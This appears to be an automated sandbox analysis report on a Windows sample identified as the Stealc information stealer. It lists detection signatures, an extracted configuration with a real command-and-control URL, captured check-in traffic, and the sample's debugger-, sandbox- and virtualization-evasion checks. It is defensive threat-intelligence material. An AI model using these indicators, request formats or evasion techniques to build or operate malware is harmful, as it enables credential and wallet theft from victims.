Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1523127
MD5:e12dff26d257800a0f411dda1fdb521f
SHA1:ed660b5a175dce979ca5e77f13d2e89b2c8aaadc
SHA256:e082f507be5674e4813a6f32759c2551bfedea8e298082cab225b787b6e89d60
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 3168 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E12DFF26D257800A0F411DDA1FDB521F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1713881816.0000000000C6E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.1673353364.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 3168JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 3168JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.fb0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-01T06:56:59.379515+020020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.fb0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Multi AV Scanner detection for domain / URL
                Source: http://185.215.113.37/wsVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.php0Virustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.phpWVirustotal: Detection: 16%Perma Link
                Multi AV Scanner detection for submitted file
                Source: file.exeVirustotal: Detection: 43%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00FBC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00FB9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00FB7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00FB9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00FC8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00FC38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FC4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00FBDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00FBE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00FC4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00FBED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FB16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FBF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00FC3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00FBBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FBDE10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIIECAAKECFHIECBKJDHHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 33 43 41 44 32 37 46 37 33 32 34 37 39 36 39 32 32 37 39 36 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 2d 2d 0d 0a Data Ascii: ------IIIECAAKECFHIECBKJDHContent-Disposition: form-data; name="hwid"B3CAD27F7324796922796------IIIECAAKECFHIECBKJDHContent-Disposition: form-data; name="build"doma------IIIECAAKECFHIECBKJDH--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00FB4880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIIECAAKECFHIECBKJDHHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 33 43 41 44 32 37 46 37 33 32 34 37 39 36 39 32 32 37 39 36 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 2d 2d 0d 0a Data Ascii: ------IIIECAAKECFHIECBKJDHContent-Disposition: form-data; name="hwid"B3CAD27F7324796922796------IIIECAAKECFHIECBKJDHContent-Disposition: form-data; name="build"doma------IIIECAAKECFHIECBKJDH--
                Source: file.exe, 00000000.00000002.1713881816.0000000000C6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1713881816.0000000000CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1713881816.0000000000CB2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1713881816.0000000000CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1713881816.0000000000CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php0
                Source: file.exe, 00000000.00000002.1713881816.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpW
                Source: file.exe, 00000000.00000002.1713881816.0000000000CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0124611F0_2_0124611F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0144A1020_2_0144A102
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0130F1B80_2_0130F1B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0137999B0_2_0137999B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0137E9E50_2_0137E9E5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012258060_2_01225806
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013888E60_2_013888E6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01374B430_2_01374B43
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0137B39E0_2_0137B39E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01347B980_2_01347B98
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0133E2E60_2_0133E2E6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0132DAEF0_2_0132DAEF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01383AE60_2_01383AE6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012F42D80_2_012F42D8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013765B60_2_013765B6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01385DE70_2_01385DE7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01279E670_2_01279E67
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00FB45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: mbunfolu ZLIB complexity 0.9947512735705596
                Source: file.exe, 00000000.00000003.1673353364.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00FC8680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00FC3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\MZENU7VC.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeVirustotal: Detection: 43%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1840128 > 1048576
                Source: file.exeStatic PE information: Raw size of mbunfolu is bigger than: 0x100000 < 0x19b000

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.fb0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;mbunfolu:EW;qktpvyhd:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;mbunfolu:EW;qktpvyhd:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00FC9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1cade3 should be: 0x1c4d0a
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: mbunfolu
                Source: file.exeStatic PE information: section name: qktpvyhd
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0142C168 push ebx; mov dword ptr [esp], ecx0_2_0142C1AF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0141316F push ebp; mov dword ptr [esp], edx0_2_01413164
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0141316F push ebx; mov dword ptr [esp], eax0_2_014131A1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0124611F push 73138423h; mov dword ptr [esp], esi0_2_01246145
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0124611F push ecx; mov dword ptr [esp], ebp0_2_0124619F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0124611F push ebp; mov dword ptr [esp], ecx0_2_012461A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0124611F push 7381BCCCh; mov dword ptr [esp], esi0_2_0124626F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0124611F push ebp; mov dword ptr [esp], esi0_2_012462B3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0144A102 push esi; mov dword ptr [esp], eax0_2_0144A235
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0144A102 push edi; mov dword ptr [esp], edx0_2_0144A291
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0144A102 push esi; mov dword ptr [esp], ecx0_2_0144A2EF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0144A102 push 54A12CFEh; mov dword ptr [esp], ebx0_2_0144A395
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01422905 push 44371931h; mov dword ptr [esp], ecx0_2_01422929
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0141B91D push 093A3CD1h; mov dword ptr [esp], esi0_2_0141B949
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0140011E push ecx; mov dword ptr [esp], 63E29DD9h0_2_014001CA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0140011E push eax; mov dword ptr [esp], ebp0_2_01400264
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0140011E push edi; mov dword ptr [esp], edx0_2_01400270
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0146A13E push ebx; mov dword ptr [esp], ecx0_2_0146A142
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0139D1B8 push ebx; mov dword ptr [esp], esi0_2_0139F0DF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_014331C5 push 71402349h; mov dword ptr [esp], ecx0_2_014331EB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0130F1B8 push eax; mov dword ptr [esp], edx0_2_0130F268
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_014279CF push ebx; mov dword ptr [esp], edx0_2_014279FF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_014279CF push esi; mov dword ptr [esp], eax0_2_01427A1B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0145B9DF push 06529C62h; mov dword ptr [esp], esi0_2_0145BA10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0145B9DF push ecx; mov dword ptr [esp], edi0_2_0145BA54
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0142C9DE push ecx; mov dword ptr [esp], esi0_2_0142CA30
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0142C9DE push 13DE3139h; mov dword ptr [esp], ebx0_2_0142CAC3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013F219F push edx; mov dword ptr [esp], 72D047CFh0_2_013F220E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01392998 push edi; mov dword ptr [esp], ebp0_2_01392A72
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013E119D push edx; mov dword ptr [esp], esi0_2_013E11DA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0137999B push esi; mov dword ptr [esp], ebx0_2_013799A9
                Source: file.exeStatic PE information: section name: mbunfolu entropy: 7.952881013739973

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00FC9860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13367
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138D7EE second address: 138D7F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138D7F8 second address: 138D804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138D804 second address: 138D81C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65A4C18F9Fh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138D81C second address: 138D820 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1372B0B second address: 1372B2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18FA8h 0x00000007 jc 00007F65A4C18F96h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1372B2D second address: 1372B62 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 pop edx 0x00000008 jmp 00007F65A45025A8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F65A45025A1h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1372B62 second address: 1372B7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18F9Eh 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jnc 00007F65A4C18F96h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138CA03 second address: 138CA0F instructions: 0x00000000 rdtsc 0x00000002 js 00007F65A450259Eh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
